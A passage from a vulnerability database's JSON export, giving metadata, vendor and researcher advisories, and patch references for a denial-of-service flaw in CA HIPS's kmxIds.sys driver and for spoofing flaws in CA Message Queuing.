"vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P",
"version": "2.0"
},
{
"acInsufInfo": null,
"accessComplexity": "Low",
"accessVector": "Network",
"authentication": "None",
"author": "NVD",
"availabilityImpact": "Partial",
"baseScore": 5.0,
"confidentialityImpact": "None",
"exploitabilityScore": null,
"id": "CVE-2009-2740",
"impactScore": null,
"integrityImpact": "None",
"obtainAllPrivilege": null,
"obtainOtherPrivilege": null,
"obtainUserPrivilege": null,
"severity": "Medium",
"trust": 0.8,
"userInteractionRequired": null,
"vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P",
"version": "2.0"
},
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "VULHUB",
"availabilityImpact": "PARTIAL",
"baseScore": 5.0,
"confidentialityImpact": "NONE",
"exploitabilityScore": 10.0,
"id": "VHN-40186",
"impactScore": 2.9,
"integrityImpact": "NONE",
"severity": "MEDIUM",
"trust": 0.1,
"vectorString": "AV:N/AC:L/AU:N/C:N/I:N/A:P",
"version": "2.0"
}
],
"cvssV3": [],
"severity": [
{
"author": "NVD",
"id": "CVE-2009-2740",
"trust": 1.8,
"value": "MEDIUM"
},
{
"author": "CNNVD",
"id": "CNNVD-200908-275",
"trust": 0.6,
"value": "MEDIUM"
},
{
"author": "VULHUB",
"id": "VHN-40186",
"trust": 0.1,
"value": "MEDIUM"
}
]
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-40186"
},
{
"db": "JVNDB",
"id": "JVNDB-2009-002627"
},
{
"db": "NVD",
"id": "CVE-2009-2740"
},
{
"db": "CNNVD",
"id": "CNNVD-200908-275"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "kmxIds.sys before 7.3.1.18 in CA Host-Based Intrusion Prevention System (HIPS) 8.1 allows remote attackers to cause a denial of service (system crash) via a malformed packet. Computer Associates Host-Based Intrusion Prevention System is affected by a denial-of-service vulnerability because the application mishandles malformed user-supplied input. \nA remote attacker may exploit this issue to cause denial-of-service conditions. \nHost-Based Intrusion Prevention System 8.1 is affected by this issue; other versions may also be vulnerable. CA HIPS integrates functions such as firewall, intrusion detection, intrusion protection, operating system security and application control to provide centralized active security protection. -----BEGIN PGP SIGNED MESSAGE-----\n\nCA20090818-01: Security Notice for CA Host-Based Intrusion Prevention\nSystem\n\nIssued: August 18, 2009\n\nCA\u0027s technical support is alerting customers to a security risk with\nCA Host-Based Intrusion Prevention System. CA\nhas issued a patch to address the vulnerability. \n\nThe vulnerability, CVE-2009-2740, is due to the kmxIds.sys driver not\ncorrectly handling certain malformed packets. An attacker can send a\nmalicious packet that will cause a kernel crash. Using Windows Explorer, locate the file \"kmxIds.sys\". By\ndefault, the file is located in the\n\"C:\\Windows\\system32\\drivers\\\" directory. \n2. Right click on the file and select Properties. \n3. Select the Version tab. \n4. If the file version is less than indicated in the below table, the\ninstallation is vulnerable. \n\nFile Name\nVersion\nSize(bytes)\nDate\n\nkmxIds.sys\n7.3.1.18\n163,840\nJune 03, 2009, 12:32:22 PM\n\nSolution\n\nCA has issued the following patch to address the vulnerability. \n\nReferences\n\nCVE-2009-2740 - HIPS kmxIds.sys remote crash\nhttp://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-2740\n\nCA20090818-01: Security Notice for CA Host-Based Intrusion Prevention\nSystem\n(line may wrap)\nhttps://support.ca.com/irj/portal/anonymous/phpsupcontent?contentID=21\n4665\n\nAcknowledgement\n\nCVE-2009-2740 - iViZ Security Research Team\n\nChange History\n\nVersion 1.0: Initial Release\n\nIf additional information is required, please contact CA Support at\nhttp://support.ca.com/\n\nIf you discover a vulnerability in CA products, please report your\nfindings to the CA Product Vulnerability Response Team. \n(line may wrap)\nhttps://support.ca.com/irj/portal/anonymous/phpsupcontent?contentID=17\n7782\n\nKevin Kotas\nCA Product Vulnerability Response Team\n\n-----BEGIN PGP SIGNATURE-----\nVersion: PGP 8.1\n\niQEVAwUBSosQJJI1FvIeMomJAQFFEAf+IcKJCxu2tj2cO24u8Hp3nQIeCyAAJITU\nFdsmn/RRDNKPXm6fCPVbeK7rnvCGRuSmEOXPT+H+Y8S5ruppUqf4kuehkvhaW3N+\nm5xjiC4BnACtPO6HE2q4JelgAdb0mKWIWnbn6ydWXKvBKViUQU4cAirCxRw7zj7P\nlrfm+V6hun7s6FTF7IccdGTJDhxXOCo9Q++FGLaOvaXJiXSS+HvzTM7MzbAEa5yy\nTosaTPGrnYO8FzQz+P/HFlCYsD6IKjCfMy1C63Qp7xCFWZ6ltJSKEIUYLu/DJlWu\nz2JUzNXn4lqNXoDLOAuBHawMiJesPXshjFqFG0kdeRxvP4JMUhENOQ==\n=AsHd\n-----END PGP SIGNATURE-----\n. ---------------------------------------------------------------------------------------------------\n\n[ iViZ Security Advisory 09-005 19/08/2009 ]\n---------------------------------------------------------------------------------------------------\n\niViZ Techno Solutions Pvt. \n http://www.ivizsecurity.com\n------------------------------------------------------------------------------------------\n\n\n * Title: CA HIPS kmxids.sys Remote Kernel Vulnerability\n * Software: CA HIPS r8.1\n\n--[ Synopsis:\n\n CA HIPS is a Host Based Intrusion Prevention System in which managed\nagents\n are deployed on individual hosts to be protected by the HIPS and\ncontrolled\n by the centralized console. \n\n--[ Affected Software:\n\n * CA HIPS r8.1 (possibly older versions too)\n\n Tested on:\n\n * Agent Product Version: 1.5.290\n * Agent Engine Version: 1.5.286\n\n--[ Technical description:\n\n When CA HIPS agent processes certain malformed IP packets, it fails\nto handle\n certain boundary condition during parsing and pattern matching of the\npacket. \n It is possible to force the kernel driver (kmxids.sys) responsible for\n analyzing each in/out packet to reference invalid/unmapped memory. \n\n The following information is obtained during crash analysis:\n\n ------\n CURRENT_IRQL: 2\n\n FAULTING_IP:\n kmxids+a2f4\n f6b8c2f4 8a26 mov ah,byte ptr [esi]\n\n DEFAULT_BUCKET_ID: DRIVER_FAULT\n\n BUGCHECK_STR: 0xD1\n\n TRAP_FRAME: f88ca4f4 -- (.trap 0xfffffffff88ca4f4)\n ErrCode = 00000000\n eax=f88ca754 ebx=81f7415a ecx=00000003 edx=428c200c esi=6e96d603\nedi=f6b83264\n eip=f6b8c2f4 esp=f88ca568 ebp=f88ca574 iopl=0 nv up ei pl nz\nna pe nc\n cs=0008 ss=0010 ds=0023 es=0023 fs=0030 gs=0000\nefl=00010206\n kmxids+0xa2f4:\n f6b8c2f4 8a26 mov ah,byte ptr [esi]\n ds:0023:6e96d603=??\n Resetting default scope\n\n LAST_CONTROL_TRANSFER: from 804f7b9d to 80527bdc\n\n STACK_TEXT:\n f88ca0a8 804f7b9d 00000003 f88ca404 00000000\n nt!RtlpBreakWithStatusInstruction\n f88ca0f4 804f878a 00000003 6e96d603 f6b8c2f4\nnt!KiBugCheckDebugBreak+0x19\n f88ca4d4 80540683 0000000a 6e96d603 00000002 nt!KeBugCheck2+0x574\n f88ca4d4 f6b8c2f4 0000000a 6e96d603 00000002 nt!KiTrap0E+0x233\n WARNING: Stack unwind information not available. Following frames may be\n wrong. \n f88ca574 f6b832e1 6e96d603 f6b83264 00000003 kmxids+0xa2f4\n 00000000 00000000 00000000 00000000 00000000 kmxids+0x12e1\n ------\n\n The issue can be used to create a Denial of Service condition on each\nof the\n host protected by affected versions of CA HIPS agent, however due to the\n nature of the vulnerability remote code execution is unlikely",
"sources": [
{
"db": "NVD",
"id": "CVE-2009-2740"
},
{
"db": "JVNDB",
"id": "JVNDB-2009-002627"
},
{
"db": "BID",
"id": "36078"
},
{
"db": "VULHUB",
"id": "VHN-40186"
},
{
"db": "PACKETSTORM",
"id": "80488"
},
{
"db": "PACKETSTORM",
"id": "80522"
}
],
"trust": 2.16
},
"exploit_availability": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/exploit_availability#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"reference": "https://www.scap.org.cn/vuln/vhn-40186",
"trust": 0.1,
"type": "unknown"
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-40186"
}
]
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "NVD",
"id": "CVE-2009-2740",
"trust": 3.0
},
{
"db": "JVNDB",
"id": "JVNDB-2009-002627",
"trust": 0.8
},
{
"db": "BUGTRAQ",
"id": "20090818 CA20090818-01: SECURITY NOTICE FOR CA HOST-BASED INTRUSION PREVENTION SYSTEM",
"trust": 0.6
},
{
"db": "CNNVD",
"id": "CNNVD-200908-275",
"trust": 0.6
},
{
"db": "BID",
"id": "36078",
"trust": 0.4
},
{
"db": "PACKETSTORM",
"id": "80488",
"trust": 0.2
},
{
"db": "PACKETSTORM",
"id": "80522",
"trust": 0.2
},
{
"db": "VULHUB",
"id": "VHN-40186",
"trust": 0.1
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-40186"
},
{
"db": "BID",
"id": "36078"
},
{
"db": "JVNDB",
"id": "JVNDB-2009-002627"
},
{
"db": "PACKETSTORM",
"id": "80488"
},
{
"db": "PACKETSTORM",
"id": "80522"
},
{
"db": "NVD",
"id": "CVE-2009-2740"
},
{
"db": "CNNVD",
"id": "CNNVD-200908-275"
}
]
},
"id": "VAR-200908-0478",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "VULHUB",
"id": "VHN-40186"
}
],
"trust": 0.01
},
"last_update_date": "2023-12-18T13:04:37.322000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "214665",
"trust": 0.8,
"url": "https://support.ca.com/irj/portal/anonymous/phpsupcontent?contentid=214665"
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2009-002627"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "CWE-399",
"trust": 1.9
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-40186"
},
{
"db": "JVNDB",
"id": "JVNDB-2009-002627"
},
{
"db": "NVD",
"id": "CVE-2009-2740"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 2.1,
"url": "https://support.ca.com/irj/portal/anonymous/phpsupcontent?contentid=214665"
},
{
"trust": 1.1,
"url": "http://www.securityfocus.com/archive/1/505881/100/0/threaded"
},
{
"trust": 0.9,
"url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2009-2740"
},
{
"trust": 0.8,
"url": "http://web.nvd.nist.gov/view/vuln/detail?vulnid=cve-2009-2740"
},
{
"trust": 0.6,
"url": "http://www.securityfocus.com/archive/1/archive/1/505881/100/0/threaded"
},
{
"trust": 0.4,
"url": " http://www.ivizsecurity.com/security-advisory-iviz-sr-09005.html"
},
{
"trust": 0.3,
"url": "http://www.ca.com/us/products/product.aspx?id=5785"
},
{
"trust": 0.2,
"url": "https://nvd.nist.gov/vuln/detail/cve-2009-2740"
},
{
"trust": 0.1,
"url": "http://support.ca.com/"
},
{
"trust": 0.1,
"url": "https://support.ca.com/irj/portal/anonymous/phpsupcontent?contentid=17"
},
{
"trust": 0.1,
"url": "https://support.ca.com/irj/portal/anonymous/phpsupcontent?contentid=21"
},
{
"trust": 0.1,
"url": "http://www.ivizsecurity.com"
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-40186"
},
{
"db": "BID",
"id": "36078"
},
{
"db": "JVNDB",
"id": "JVNDB-2009-002627"
},
{
"db": "PACKETSTORM",
"id": "80488"
},
{
"db": "PACKETSTORM",
"id": "80522"
},
{
"db": "NVD",
"id": "CVE-2009-2740"
},
{
"db": "CNNVD",
"id": "CNNVD-200908-275"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "VULHUB",
"id": "VHN-40186"
},
{
"db": "BID",
"id": "36078"
},
{
"db": "JVNDB",
"id": "JVNDB-2009-002627"
},
{
"db": "PACKETSTORM",
"id": "80488"
},
{
"db": "PACKETSTORM",
"id": "80522"
},
{
"db": "NVD",
"id": "CVE-2009-2740"
},
{
"db": "CNNVD",
"id": "CNNVD-200908-275"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2009-08-19T00:00:00",
"db": "VULHUB",
"id": "VHN-40186"
},
{
"date": "2009-08-18T00:00:00",
"db": "BID",
"id": "36078"
},
{
"date": "2010-12-27T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2009-002627"
},
{
"date": "2009-08-18T22:20:51",
"db": "PACKETSTORM",
"id": "80488"
},
{
"date": "2009-08-23T15:54:12",
"db": "PACKETSTORM",
"id": "80522"
},
{
"date": "2009-08-19T17:30:01.093000",
"db": "NVD",
"id": "CVE-2009-2740"
},
{
"date": "2009-08-19T00:00:00",
"db": "CNNVD",
"id": "CNNVD-200908-275"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2018-10-10T00:00:00",
"db": "VULHUB",
"id": "VHN-40186"
},
{
"date": "2009-08-21T15:54:00",
"db": "BID",
"id": "36078"
},
{
"date": "2010-12-27T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2009-002627"
},
{
"date": "2018-10-10T19:42:10.233000",
"db": "NVD",
"id": "CVE-2009-2740"
},
{
"date": "2009-08-21T00:00:00",
"db": "CNNVD",
"id": "CNNVD-200908-275"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "remote",
"sources": [
{
"db": "PACKETSTORM",
"id": "80488"
},
{
"db": "CNNVD",
"id": "CNNVD-200908-275"
}
],
"trust": 0.7
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "CA Host-Based Intrusion Prevention System of kmxIds.sys Service disruption in (DoS) Vulnerabilities",
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2009-002627"
}
],
"trust": 0.8
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "resource management error",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-200908-275"
}
],
"trust": 0.6
}
}
VAR-200508-0052
Vulnerability from variot - Updated: 2023-12-18 12:53Computer Associates (CA) Message Queuing (CAM / CAFT) 1.05, 1.07 before Build 220_13, and 1.11 before Build 29_13 allows remote attackers to execute arbitrary commands via spoofed CAFT packets. CAM is prone to a vulnerability that could permit the spoofing of a CAFT application utilizing the CAM instance. This may ultimately allow the execution of arbitrary commands. CAFT is a file transfer application that utilizes CAM to send and receive the files. The problem presents itself due to a failure in the CAM service to verify the legitimacy of the CAFT application.
Bist Du interessiert an einem neuen Job in IT-Sicherheit?
Secunia hat zwei freie Stellen als Junior und Senior Spezialist in IT- Sicherheit: http://secunia.com/secunia_vacancies/
TITLE: CA Various Products Message Queuing Vulnerabilities
SECUNIA ADVISORY ID: SA16513
VERIFY ADVISORY: http://secunia.com/advisories/16513/
CRITICAL: Moderately critical
IMPACT: Spoofing, DoS, System access
WHERE:
From local network
SOFTWARE: CA Unicenter TNG 2.x http://secunia.com/product/3206/ CA Unicenter Software Delivery 4.x http://secunia.com/product/5597/ CA Unicenter Software Delivery 3.x http://secunia.com/product/5596/ CA Unicenter Service Level Management 3.x http://secunia.com/product/5595/ CA Unicenter Remote Control 6.x http://secunia.com/product/2622/ CA Unicenter Performance Management for OpenVMS 2.x http://secunia.com/product/5573/ CA Unicenter Network and Systems Management (NSM) Wireless Network Management Option 3.x http://secunia.com/product/5594/ CA Unicenter Network and Systems Management (NSM) 3.x http://secunia.com/product/1683/ CA Unicenter Management for WebSphere MQ 3.x http://secunia.com/product/5590/ CA Unicenter Management for Web Servers 5.x http://secunia.com/product/5593/ CA Unicenter Management for Microsoft Exchange 4.x http://secunia.com/product/5591/ CA Unicenter Management for Lotus Notes/Domino 4.x http://secunia.com/product/5592/ CA Unicenter Jasmine 3.x http://secunia.com/product/5589/ CA Unicenter Enterprise Job Manager 1.x http://secunia.com/product/5588/ CA Unicenter Data Transport Option 2.x http://secunia.com/product/5587/ CA Unicenter Asset Management 4.x http://secunia.com/product/1682/ CA Unicenter Asset Management 3.x http://secunia.com/product/5586/ CA Unicenter Application Performance Monitor 3.x http://secunia.com/product/5585/ CA eTrust Admin 8.x http://secunia.com/product/5584/ CA eTrust Admin 2.x http://secunia.com/product/5583/ CA CleverPath Predictive Analysis Server 3.x http://secunia.com/product/5581/ CA CleverPath Predictive Analysis Server 2.x http://secunia.com/product/5580/ CA CleverPath OLAP 5.x http://secunia.com/product/5578/ CA CleverPath Enterprise Content Manager (ECM) 3.x http://secunia.com/product/5579/ CA CleverPath Aion 10.x http://secunia.com/product/5582/ CA BrightStor SAN Manager 11.x http://secunia.com/product/5576/ CA BrightStor SAN Manager 1.x http://secunia.com/product/5575/ CA BrightStor Portal 11.x http://secunia.com/product/5577/ CA Advantage Data Transport 3.x http://secunia.com/product/5574/
DESCRIPTION: Some vulnerabilities have been reported in various products within the CA Message Queuing (CAM / CAFT) software, which can be exploited by malicious people to cause a DoS (Denial of Service) or compromise a vulnerable system.
1) An unspecified error in the CAM service can be exploited to cause a DoS by sending specially crafted packets to the TCP port.
2) Unspecified boundary errors can be exploited to cause buffer overflows by sending specially crafted packets to the service.
SOLUTION: Apply patches (see vendor advisory for details).
PROVIDED AND/OR DISCOVERED BY: Reported by vendor.
ORIGINAL ADVISORY: Computer Associates: http://supportconnectw.ca.com/public/ca_common_docs/camsecurity_notice.asp
About: This Advisory was delivered by Secunia as a free service to help everybody keeping their systems up to date against the latest vulnerabilities.
Subscribe: http://secunia.com/secunia_security_advisories/
Definitions: (Criticality, Where etc.) http://secunia.com/about_secunia_advisories/
Please Note: Secunia recommends that you verify all advisories you receive by clicking the link. Secunia NEVER sends attached files with advisories. Secunia does not advise people to install third party patches, only use those supplied by the vendor.
Unsubscribe: Secunia Security Advisories http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org
Show details on source website
{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-200508-0052",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "unicenter tng",
"scope": "eq",
"trust": 1.6,
"vendor": "ca",
"version": "2.2"
},
{
"model": "unicenter software delivery",
"scope": "eq",
"trust": 1.6,
"vendor": "ca",
"version": "4.0"
},
{
"model": "etrust admin",
"scope": "eq",
"trust": 1.0,
"vendor": "ca",
"version": "2.7"
},
{
"model": "unicenter service level management",
"scope": "eq",
"trust": 1.0,
"vendor": "broadcom",
"version": "3.5"
},
{
"model": "unicenter management portal",
"scope": "eq",
"trust": 1.0,
"vendor": "broadcom",
"version": "2.0"
},
{
"model": "unicenter tng",
"scope": "eq",
"trust": 1.0,
"vendor": "broadcom",
"version": "2.2"
},
{
"model": "brightstor san manager",
"scope": "eq",
"trust": 1.0,
"vendor": "broadcom",
"version": "1.1"
},
{
"model": "etrust admin",
"scope": "eq",
"trust": 1.0,
"vendor": "ca",
"version": "2.1"
},
{
"model": "cleverpath olap",
"scope": "eq",
"trust": 1.0,
"vendor": "broadcom",
"version": "5.1"
},
{
"model": "unicenter application performance monitor",
"scope": "eq",
"trust": 1.0,
"vendor": "broadcom",
"version": "3.0"
},
{
"model": "unicenter remote control",
"scope": "eq",
"trust": 1.0,
"vendor": "broadcom",
"version": "6.0"
},
{
"model": "cleverpath aion",
"scope": "eq",
"trust": 1.0,
"vendor": "broadcom",
"version": "10.0"
},
{
"model": "unicenter management",
"scope": "eq",
"trust": 1.0,
"vendor": "ca",
"version": "4.0"
},
{
"model": "unicenter asset management",
"scope": "eq",
"trust": 1.0,
"vendor": "ca",
"version": "4.0"
},
{
"model": "unicenter data transport option",
"scope": "eq",
"trust": 1.0,
"vendor": "broadcom",
"version": "2.0"
},
{
"model": "messaging",
"scope": "eq",
"trust": 1.0,
"vendor": "broadcom",
"version": "1.7"
},
{
"model": "unicenter management",
"scope": "eq",
"trust": 1.0,
"vendor": "ca",
"version": "3.5"
},
{
"model": "etrust admin",
"scope": "eq",
"trust": 1.0,
"vendor": "ca",
"version": "2.4"
},
{
"model": "unicenter management portal",
"scope": "eq",
"trust": 1.0,
"vendor": "broadcom",
"version": "3.1"
},
{
"model": "unicenter tng",
"scope": "eq",
"trust": 1.0,
"vendor": "broadcom",
"version": "2.1"
},
{
"model": "unicenter management",
"scope": "eq",
"trust": 1.0,
"vendor": "ca",
"version": "5.0"
},
{
"model": "unicenter service level management",
"scope": "eq",
"trust": 1.0,
"vendor": "broadcom",
"version": "3.0.1"
},
{
"model": "unicenter network and systems management",
"scope": "eq",
"trust": 1.0,
"vendor": "broadcom",
"version": "3.1"
},
{
"model": "unicenter tng",
"scope": "eq",
"trust": 1.0,
"vendor": "broadcom",
"version": "2.4"
},
{
"model": "unicenter software delivery",
"scope": "eq",
"trust": 1.0,
"vendor": "broadcom",
"version": "3.1"
},
{
"model": "advantage data transport",
"scope": "eq",
"trust": 1.0,
"vendor": "broadcom",
"version": "3.0"
},
{
"model": "cleverpath predictive analysis server",
"scope": "eq",
"trust": 1.0,
"vendor": "broadcom",
"version": "3.0"
},
{
"model": "messaging",
"scope": "eq",
"trust": 1.0,
"vendor": "broadcom",
"version": "1.11"
},
{
"model": "unicenter management",
"scope": "eq",
"trust": 1.0,
"vendor": "ca",
"version": "4.1"
},
{
"model": "unicenter performance management",
"scope": "eq",
"trust": 1.0,
"vendor": "broadcom",
"version": "2.4"
},
{
"model": "unicenter service level management",
"scope": "eq",
"trust": 1.0,
"vendor": "broadcom",
"version": "3.0.2"
},
{
"model": "unicenter enterprise job manager",
"scope": "eq",
"trust": 1.0,
"vendor": "ca",
"version": "1.0"
},
{
"model": "unicenter application performance monitor",
"scope": "eq",
"trust": 1.0,
"vendor": "broadcom",
"version": "3.5"
},
{
"model": "unicenter service level management",
"scope": "eq",
"trust": 1.0,
"vendor": "broadcom",
"version": "3.0"
},
{
"model": "brightstor san manager",
"scope": "eq",
"trust": 1.0,
"vendor": "broadcom",
"version": "11.1"
},
{
"model": "unicenter nsm wireless network management option",
"scope": "eq",
"trust": 1.0,
"vendor": "broadcom",
"version": "3.0"
},
{
"model": "unicenter software delivery",
"scope": "eq",
"trust": 1.0,
"vendor": "broadcom",
"version": "4.0"
},
{
"model": "unicenter asset management",
"scope": "eq",
"trust": 1.0,
"vendor": "broadcom",
"version": "3.1"
},
{
"model": "brightstor portal",
"scope": "eq",
"trust": 1.0,
"vendor": "broadcom",
"version": "11.1"
},
{
"model": "unicenter tng",
"scope": "eq",
"trust": 1.0,
"vendor": "broadcom",
"version": "2.4.2"
},
{
"model": "messaging",
"scope": "eq",
"trust": 1.0,
"vendor": "broadcom",
"version": "1.5"
},
{
"model": "unicenter asset management",
"scope": "eq",
"trust": 1.0,
"vendor": "broadcom",
"version": "3.2"
},
{
"model": "etrust admin",
"scope": "eq",
"trust": 1.0,
"vendor": "ca",
"version": "2.9"
},
{
"model": "unicenter management",
"scope": "eq",
"trust": 1.0,
"vendor": "ca",
"version": "5.0.1"
},
{
"model": "adviseit",
"scope": "eq",
"trust": 1.0,
"vendor": "broadcom",
"version": "2.4"
},
{
"model": "cleverpath predictive analysis server",
"scope": "eq",
"trust": 1.0,
"vendor": "broadcom",
"version": "2.0"
},
{
"model": "unicenter network and systems management",
"scope": "eq",
"trust": 1.0,
"vendor": "broadcom",
"version": "3.0"
},
{
"model": "cleverpath ecm",
"scope": "eq",
"trust": 1.0,
"vendor": "broadcom",
"version": "3.5"
},
{
"model": "unicenter asset management",
"scope": "eq",
"trust": 1.0,
"vendor": "broadcom",
"version": "4.0"
},
{
"model": "unicenter software delivery",
"scope": "eq",
"trust": 1.0,
"vendor": "broadcom",
"version": "3.0"
},
{
"model": "etrust admin",
"scope": "eq",
"trust": 1.0,
"vendor": "broadcom",
"version": "8.1"
},
{
"model": "unicenter jasmine",
"scope": "eq",
"trust": 1.0,
"vendor": "broadcom",
"version": "3.0"
},
{
"model": "etrust admin",
"scope": "eq",
"trust": 1.0,
"vendor": "broadcom",
"version": "8.0"
},
{
"model": null,
"scope": null,
"trust": 0.8,
"vendor": "computer associates",
"version": null
},
{
"model": "unicenter tng",
"scope": "eq",
"trust": 0.6,
"vendor": "ca",
"version": "2.4.2"
},
{
"model": "unicenter tng",
"scope": "eq",
"trust": 0.6,
"vendor": "ca",
"version": "2.1"
},
{
"model": "unicenter tng",
"scope": "eq",
"trust": 0.6,
"vendor": "ca",
"version": "2.4"
},
{
"model": "unicenter software delivery",
"scope": "eq",
"trust": 0.6,
"vendor": "ca",
"version": "3.1"
},
{
"model": "associates unicenter tng",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "2.4.2"
},
{
"model": "associates unicenter tng",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "2.4"
},
{
"model": "associates unicenter tng",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "2.2"
},
{
"model": "associates unicenter tng",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "2.1"
},
{
"model": "associates unicenter software delivery sp1",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "4.0"
},
{
"model": "associates unicenter software delivery",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "4.0"
},
{
"model": "associates unicenter software delivery sp2",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "3.1"
},
{
"model": "associates unicenter software delivery sp1",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "3.1"
},
{
"model": "associates unicenter software delivery",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "3.1"
},
{
"model": "associates unicenter software delivery",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "3.0"
},
{
"model": "associates unicenter service level management",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "3.5"
},
{
"model": "associates unicenter service level management",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "3.0.2"
},
{
"model": "associates unicenter service level management",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "3.0.1"
},
{
"model": "associates unicenter service level management",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "3.0"
},
{
"model": "associates unicenter remote control sp1",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "6.0"
},
{
"model": "associates unicenter remote control",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "6.0"
},
{
"model": "associates unicenter performance management for openvms sp3",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "2.4"
},
{
"model": "associates unicenter nsm wireless network management option",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "3.0"
},
{
